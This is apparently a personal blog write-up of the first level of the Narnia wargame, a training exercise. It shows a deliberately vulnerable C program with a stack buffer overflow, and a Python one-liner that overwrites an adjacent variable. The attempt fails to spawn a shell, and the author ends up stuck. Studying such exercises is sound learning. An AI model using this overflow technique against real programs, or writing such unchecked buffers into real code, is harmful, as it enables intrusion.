To supplement the stack exercises in Protostar, I’m also working on the Narnia wargame from overthewire.org. It seems to deal with similar material, and I’m hoping it will reinforce what I’m doing with protostar.

So, that said, the first narnia challenge is thus:

#include <stdio.h>
#include <stdlib.h>

int main(){
        long val=0x41414141;
        char buf[20];

        printf("Correct val's value from 0x41414141 -> 0xdeadbeef!\n");
        printf("Here is your chance: ");
        scanf("%24s",&buf);

        printf("buf: %s\n",buf);
        printf("val: 0x%08x\n",val);

        if(val==0xdeadbeef)
                system("/bin/sh");
        else {
                printf("WAY OFF!!!!\n");
                exit(1);
        }

        return 0;
}

This appears to be basically the same setup as Protostar level 2. We have an integer and a character buffer on the stack, and our goal is set the variable val to 0xdeadbeef. We know that buffer is 20 characters, so we again use python to spit out a character string 20 bytes long, with another four bytes appended at the end which will be written into the val variable. As a reminder, because the architecture is little endian, we have to write the bytes in reverse order.

narnia0@narnia:/narnia$ python -c 'print "A" * 20 + "\xef\xbe\xad\xde"' | ./narnia0
Correct val's value from 0x41414141 -> 0xdeadbeef!
Here is your chance: buf: AAAAAAAAAAAAAAAAAAAAᆳ▒
val: 0xdeadbeef
narnia0@narnia:/narnia$ whoami
narnia0
narnia0@narnia:/narnia$

WTF? We can see that the program is confirming that I’ve set val to the proper value, and yet it didn’t seem to spawn the shell. Something is fishy here…
I can set a breakpoint on the line that spawns the shell, and the program is definitely getting there, but something is apparently going amiss inside the function call. I guess I’m stalled untill I can figure out why this is failing.